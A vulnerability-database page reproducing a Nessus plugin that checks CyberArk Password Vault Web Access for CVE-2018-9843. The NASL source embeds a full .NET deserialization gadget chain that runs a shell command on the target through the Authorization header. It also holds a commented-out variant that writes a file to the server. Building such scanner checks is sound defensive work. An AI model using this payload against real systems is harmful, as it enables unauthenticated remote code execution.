Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nessusThis script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.CYBERARK_PVWA_CVE-2018-9843.NASL
HistoryJun 01, 2018 - 12:00 a.m.

CyberArk Password Vault Web Access .NET Object Deserialization (Direct Check)

2018-06-0100:00:00
This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com
586

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS

0.715

Percentile

98.1%

JSON

The CyberArk Password Vault Web Access running on the remote host is affected by a remote code execution vulnerability due to unsafe deserialization of an .NET object. An unauthenticated, remote attacker can exploit this, via a crafted a .NET object, to execute arbitrary .NET code in the context of the IIS server.

#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(110287);
  script_version("1.5");
  script_cvs_date("Date: 2019/10/07 15:15:27");

  script_cve_id("CVE-2018-9843");
  script_bugtraq_id(105180);

  script_name(english:"CyberArk Password Vault Web Access .NET Object Deserialization (Direct Check)");
  script_summary(english:"Sends a .NET object to trigger an error message.");

  script_set_attribute(attribute:"synopsis", value:
"An Identity Management application running on the remote host is affected by
a remote code execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The CyberArk Password Vault Web Access running on the remote host is
affected by a remote code execution vulnerability due to unsafe
deserialization of an .NET object. An unauthenticated, remote
attacker can exploit this, via a crafted a .NET object, to execute
arbitrary .NET code in the context of the IIS server.");

  # https://www.redteam-pentesting.de/en/advisories/rt-sa-2017-014/-cyberark-password-vault-web-access-remote-code-execution
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?e1d84c64");
  script_set_attribute(attribute:"solution", value:
"Upgrade to CyberArk Password Vault Web Access 9.9.5, 9.10.1, 10.2 or Later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2018-9843");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2018/04/09");
  script_set_attribute(attribute:"patch_publication_date", value:"2018/02/28");
  script_set_attribute(attribute:"plugin_publication_date", value:"2018/06/01");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:cyberark:password_vault");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("cyberark_password_vault_detection.nbin");
  script_require_keys("installed_sw/CyberArk Password Vault Web Access");
  script_require_ports("Services/www", 80, 443);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("install_func.inc");

app   = 'CyberArk Password Vault Web Access';

# Plugin will exit if app is not detected on host
get_install_count(app_name:app, exit_if_zero:TRUE);

# Plugin will exit if app is not detected on this port
port = get_http_port(default:80);
install = get_single_install(app_name:app, port:port, exit_if_unknown_ver:FALSE);

url = "/PasswordVault/WebServices/PIMServices.svc/Applications/?Location=\&IncludeSublocations=true";

cmd = 'ping -n 3 localhost';

# vuln verification 
#cmd = 'dir > c:\\Windows\\Temp\\hacked.txt';

cmd = '/c ' + cmd;

obj = raw_string(
0x00,0x01,0x00,0x00,0x00,0xFF,0xFF,0xFF,0xFF,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x0C,0x02,0x00,0x00,0x00,0x49,0x53,0x79,0x73,0x74,0x65,0x6D,0x2C,0x20,0x56,
0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,
0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,
0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,
0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,
0x05,0x01,0x00,0x00,0x00,0x84,0x01,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x43,0x6F,
0x6C,0x6C,0x65,0x63,0x74,0x69,0x6F,0x6E,0x73,0x2E,0x47,0x65,0x6E,0x65,0x72,0x69,
0x63,0x2E,0x53,0x6F,0x72,0x74,0x65,0x64,0x53,0x65,0x74,0x60,0x31,0x5B,0x5B,0x53,
0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x6D,0x73,
0x63,0x6F,0x72,0x6C,0x69,0x62,0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,
0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65,
0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63,
0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35,
0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,0x5D,0x5D,0x04,0x00,0x00,0x00,0x05,
0x43,0x6F,0x75,0x6E,0x74,0x08,0x43,0x6F,0x6D,0x70,0x61,0x72,0x65,0x72,0x07,0x56,
0x65,0x72,0x73,0x69,0x6F,0x6E,0x05,0x49,0x74,0x65,0x6D,0x73,0x00,0x03,0x00,0x06,
0x08,0x8D,0x01,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x43,0x6F,0x6C,0x6C,0x65,0x63,
0x74,0x69,0x6F,0x6E,0x73,0x2E,0x47,0x65,0x6E,0x65,0x72,0x69,0x63,0x2E,0x43,0x6F,
0x6D,0x70,0x61,0x72,0x69,0x73,0x6F,0x6E,0x43,0x6F,0x6D,0x70,0x61,0x72,0x65,0x72,
0x60,0x31,0x5B,0x5B,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,
0x67,0x2C,0x20,0x6D,0x73,0x63,0x6F,0x72,0x6C,0x69,0x62,0x2C,0x20,0x56,0x65,0x72,
0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,
0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,
0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,
0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,0x5D,0x5D,
0x08,0x02,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x09,0x03,0x00,0x00,0x00,0x02,0x00,
0x00,0x00,0x09,0x04,0x00,0x00,0x00,0x04,0x03,0x00,0x00,0x00,0x8D,0x01,0x53,0x79,
0x73,0x74,0x65,0x6D,0x2E,0x43,0x6F,0x6C,0x6C,0x65,0x63,0x74,0x69,0x6F,0x6E,0x73,
0x2E,0x47,0x65,0x6E,0x65,0x72,0x69,0x63,0x2E,0x43,0x6F,0x6D,0x70,0x61,0x72,0x69,
0x73,0x6F,0x6E,0x43,0x6F,0x6D,0x70,0x61,0x72,0x65,0x72,0x60,0x31,0x5B,0x5B,0x53,
0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x6D,0x73,
0x63,0x6F,0x72,0x6C,0x69,0x62,0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,
0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65,
0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63,
0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35,
0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,0x5D,0x5D,0x01,0x00,0x00,0x00,0x0B,
0x5F,0x63,0x6F,0x6D,0x70,0x61,0x72,0x69,0x73,0x6F,0x6E,0x03,0x22,0x53,0x79,0x73,
0x74,0x65,0x6D,0x2E,0x44,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x53,0x65,0x72,0x69,
0x61,0x6C,0x69,0x7A,0x61,0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x09,
0x05,0x00,0x00,0x00,0x11,0x04,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x06,0x06,0x00,
0x00) +
mkword(strlen(cmd)) + cmd +
raw_string(
0x06,0x07,0x00,0x00,0x00,0x03,0x63,0x6D,
0x64,0x04,0x05,0x00,0x00,0x00,0x22,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x44,0x65,
0x6C,0x65,0x67,0x61,0x74,0x65,0x53,0x65,0x72,0x69,0x61,0x6C,0x69,0x7A,0x61,0x74,
0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x03,0x00,0x00,0x00,0x08,0x44,0x65,
0x6C,0x65,0x67,0x61,0x74,0x65,0x07,0x6D,0x65,0x74,0x68,0x6F,0x64,0x30,0x07,0x6D,
0x65,0x74,0x68,0x6F,0x64,0x31,0x03,0x03,0x03,0x30,0x53,0x79,0x73,0x74,0x65,0x6D,
0x2E,0x44,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x53,0x65,0x72,0x69,0x61,0x6C,0x69,
0x7A,0x61,0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x2B,0x44,0x65,0x6C,
0x65,0x67,0x61,0x74,0x65,0x45,0x6E,0x74,0x72,0x79,0x2F,0x53,0x79,0x73,0x74,0x65,
0x6D,0x2E,0x52,0x65,0x66,0x6C,0x65,0x63,0x74,0x69,0x6F,0x6E,0x2E,0x4D,0x65,0x6D,
0x62,0x65,0x72,0x49,0x6E,0x66,0x6F,0x53,0x65,0x72,0x69,0x61,0x6C,0x69,0x7A,0x61,
0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x2F,0x53,0x79,0x73,0x74,0x65,
0x6D,0x2E,0x52,0x65,0x66,0x6C,0x65,0x63,0x74,0x69,0x6F,0x6E,0x2E,0x4D,0x65,0x6D,
0x62,0x65,0x72,0x49,0x6E,0x66,0x6F,0x53,0x65,0x72,0x69,0x61,0x6C,0x69,0x7A,0x61,
0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x09,0x08,0x00,0x00,0x00,0x09,
0x09,0x00,0x00,0x00,0x09,0x0A,0x00,0x00,0x00,0x04,0x08,0x00,0x00,0x00,0x30,0x53,
0x79,0x73,0x74,0x65,0x6D,0x2E,0x44,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x53,0x65,
0x72,0x69,0x61,0x6C,0x69,0x7A,0x61,0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,
0x72,0x2B,0x44,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x45,0x6E,0x74,0x72,0x79,0x07,
0x00,0x00,0x00,0x04,0x74,0x79,0x70,0x65,0x08,0x61,0x73,0x73,0x65,0x6D,0x62,0x6C,
0x79,0x06,0x74,0x61,0x72,0x67,0x65,0x74,0x12,0x74,0x61,0x72,0x67,0x65,0x74,0x54,
0x79,0x70,0x65,0x41,0x73,0x73,0x65,0x6D,0x62,0x6C,0x79,0x0E,0x74,0x61,0x72,0x67,
0x65,0x74,0x54,0x79,0x70,0x65,0x4E,0x61,0x6D,0x65,0x0A,0x6D,0x65,0x74,0x68,0x6F,
0x64,0x4E,0x61,0x6D,0x65,0x0D,0x64,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x45,0x6E,
0x74,0x72,0x79,0x01,0x01,0x02,0x01,0x01,0x01,0x03,0x30,0x53,0x79,0x73,0x74,0x65,
0x6D,0x2E,0x44,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x53,0x65,0x72,0x69,0x61,0x6C,
0x69,0x7A,0x61,0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x2B,0x44,0x65,
0x6C,0x65,0x67,0x61,0x74,0x65,0x45,0x6E,0x74,0x72,0x79,0x06,0x0B,0x00,0x00,0x00,
0xB0,0x02,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x46,0x75,0x6E,0x63,0x60,0x33,0x5B,
0x5B,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,
0x6D,0x73,0x63,0x6F,0x72,0x6C,0x69,0x62,0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,
0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,
0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,
0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,
0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,0x5D,0x2C,0x5B,0x53,0x79,
0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x6D,0x73,0x63,
0x6F,0x72,0x6C,0x69,0x62,0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,
0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,
0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,
0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,
0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,0x5D,0x2C,0x5B,0x53,0x79,0x73,0x74,0x65,
0x6D,0x2E,0x44,0x69,0x61,0x67,0x6E,0x6F,0x73,0x74,0x69,0x63,0x73,0x2E,0x50,0x72,
0x6F,0x63,0x65,0x73,0x73,0x2C,0x20,0x53,0x79,0x73,0x74,0x65,0x6D,0x2C,0x20,0x56,
0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,
0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,
0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,
0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,
0x5D,0x5D,0x06,0x0C,0x00,0x00,0x00,0x4B,0x6D,0x73,0x63,0x6F,0x72,0x6C,0x69,0x62,
0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E,
0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72,
0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B,
0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65,
0x30,0x38,0x39,0x0A,0x06,0x0D,0x00,0x00,0x00,0x49,0x53,0x79,0x73,0x74,0x65,0x6D,
0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E,
0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72,
0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B,
0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65,
0x30,0x38,0x39,0x06,0x0E,0x00,0x00,0x00,0x1A,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,
0x44,0x69,0x61,0x67,0x6E,0x6F,0x73,0x74,0x69,0x63,0x73,0x2E,0x50,0x72,0x6F,0x63,
0x65,0x73,0x73,0x06,0x0F,0x00,0x00,0x00,0x05,0x53,0x74,0x61,0x72,0x74,0x09,0x10,
0x00,0x00,0x00,0x04,0x09,0x00,0x00,0x00,0x2F,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,
0x52,0x65,0x66,0x6C,0x65,0x63,0x74,0x69,0x6F,0x6E,0x2E,0x4D,0x65,0x6D,0x62,0x65,
0x72,0x49,0x6E,0x66,0x6F,0x53,0x65,0x72,0x69,0x61,0x6C,0x69,0x7A,0x61,0x74,0x69,
0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x07,0x00,0x00,0x00,0x04,0x4E,0x61,0x6D,
0x65,0x0C,0x41,0x73,0x73,0x65,0x6D,0x62,0x6C,0x79,0x4E,0x61,0x6D,0x65,0x09,0x43,
0x6C,0x61,0x73,0x73,0x4E,0x61,0x6D,0x65,0x09,0x53,0x69,0x67,0x6E,0x61,0x74,0x75,
0x72,0x65,0x0A,0x53,0x69,0x67,0x6E,0x61,0x74,0x75,0x72,0x65,0x32,0x0A,0x4D,0x65,
0x6D,0x62,0x65,0x72,0x54,0x79,0x70,0x65,0x10,0x47,0x65,0x6E,0x65,0x72,0x69,0x63,
0x41,0x72,0x67,0x75,0x6D,0x65,0x6E,0x74,0x73,0x01,0x01,0x01,0x01,0x01,0x00,0x03,
0x08,0x0D,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x54,0x79,0x70,0x65,0x5B,0x5D,0x09,
0x0F,0x00,0x00,0x00,0x09,0x0D,0x00,0x00,0x00,0x09,0x0E,0x00,0x00,0x00,0x06,0x14,
0x00,0x00,0x00,0x3E,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x44,0x69,0x61,0x67,0x6E,
0x6F,0x73,0x74,0x69,0x63,0x73,0x2E,0x50,0x72,0x6F,0x63,0x65,0x73,0x73,0x20,0x53,
0x74,0x61,0x72,0x74,0x28,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,
0x6E,0x67,0x2C,0x20,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,
0x67,0x29,0x06,0x15,0x00,0x00,0x00,0x3E,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x44,
0x69,0x61,0x67,0x6E,0x6F,0x73,0x74,0x69,0x63,0x73,0x2E,0x50,0x72,0x6F,0x63,0x65,
0x73,0x73,0x20,0x53,0x74,0x61,0x72,0x74,0x28,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,
0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,
0x74,0x72,0x69,0x6E,0x67,0x29,0x08,0x00,0x00,0x00,0x0A,0x01,0x0A,0x00,0x00,0x00,
0x09,0x00,0x00,0x00,0x06,0x16,0x00,0x00,0x00,0x07,0x43,0x6F,0x6D,0x70,0x61,0x72,
0x65,0x09,0x0C,0x00,0x00,0x00,0x06,0x18,0x00,0x00,0x00,0x0D,0x53,0x79,0x73,0x74,
0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x06,0x19,0x00,0x00,0x00,0x2B,0x49,
0x6E,0x74,0x33,0x32,0x20,0x43,0x6F,0x6D,0x70,0x61,0x72,0x65,0x28,0x53,0x79,0x73,
0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x53,0x79,0x73,0x74,
0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x29,0x06,0x1A,0x00,0x00,0x00,0x32,
0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x49,0x6E,0x74,0x33,0x32,0x20,0x43,0x6F,0x6D,
0x70,0x61,0x72,0x65,0x28,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,
0x6E,0x67,0x2C,0x20,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,
0x67,0x29,0x08,0x00,0x00,0x00,0x0A,0x01,0x10,0x00,0x00,0x00,0x08,0x00,0x00,0x00,
0x06,0x1B,0x00,0x00,0x00,0x71,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x43,0x6F,0x6D,
0x70,0x61,0x72,0x69,0x73,0x6F,0x6E,0x60,0x31,0x5B,0x5B,0x53,0x79,0x73,0x74,0x65,
0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x6D,0x73,0x63,0x6F,0x72,0x6C,
0x69,0x62,0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,
0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,
0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,
0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,
0x34,0x65,0x30,0x38,0x39,0x5D,0x5D,0x09,0x0C,0x00,0x00,0x00,0x0A,0x09,0x0C,0x00,
0x00,0x00,0x09,0x18,0x00,0x00,0x00,0x09,0x16,0x00,0x00,0x00,0x0A,0x0B
); 

# PVWA can be slow to respond
http_set_read_timeout(30);

token = base64(str: obj);
res = http_send_recv3(
        port        : port, 
        method      : 'GET',
        item        : url,
        add_headers : make_array('authorization', token),
        content_type: 'application/json',
        fetch404    : TRUE,
        exit_on_fail: TRUE
      );

if(isnull(res[2]))
  audit(AUDIT_RESP_NOT, port, 'a GET request: No data in the response body');

# 
# Patched:
# 403 
# {"ErrorCode":"CAWS00001E","ErrorMessage":"Connection to the Vault was terminated."}
if (res[2] !~ "Unable to cast object of type.* to type 'CyberArk.Services.Web.SessionIdentifiers")
{
  audit(AUDIT_INST_VER_NOT_VULN, app, install['version']);
}

#
# Vulenrable:
# 403
# {"ErrorCode":"CAWS00001E","ErrorMessage":"Error raised while trying to establish session using session token provided. Error: Unable to cast object of type 'System.Collections.Generic.SortedSet`1[System.String]' to type 'CyberArk.Services.Web.SessionIdentifiers'."}
#
report =
  '\nNessus was able to detect the .NET deserialization vulnerability by' +
  '\nsending a crafted .NET object.' +
  '\n';
security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);

Related

zdt 1
cvelist 1
prion 1
exploitpack 1
exploitdb 1
nvd 1
thn 1
packetstorm 1
nessus 1
cve 1
zdt
zdt
CyberArk Password Vault Web Access < 9.9.5 / < 9.10 / 10.1 - Remote Code Execution Vulnerabili
2018-04-09 00:00:00
cvelist
cvelist
CVE-2018-9843
2018-04-12 15:00:00
prion
prion
Authorization
2018-04-12 15:29:00
exploitpack
exploitpack
CyberArk Password Vault Web Access 9.9.5 9.10 10.1 - Remote Code Execution
2018-04-09 00:00:00
exploitdb
exploitdb
CyberArk Password Vault Web Access &lt; 9.9.5 / &lt; 9.10 / 10.1 - Remote Code Execution
2018-04-09 00:00:00
nvd
nvd
CVE-2018-9843
2018-04-12 15:29:00
thn
thn
Critical Code Execution Flaw Found in CyberArk Enterprise Password Vault
2018-04-09 14:46:00
packetstorm
packetstorm
CyberArk Password Vault Web Access Remote Code Execution
2018-04-09 00:00:00
nessus
nessus
CyberArk Password Vault Web Access .NET Object Deserialization
2018-04-10 00:00:00
cve
cve
CVE-2018-9843
2018-04-12 15:29:00

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS

0.715

Percentile

98.1%

JSON
Related for CYBERARK_PVWA_CVE-2018-9843.NASL
zdt1cvelist1prion1exploitpack1exploitdb1nvd1thn1packetstorm1nessus1cve1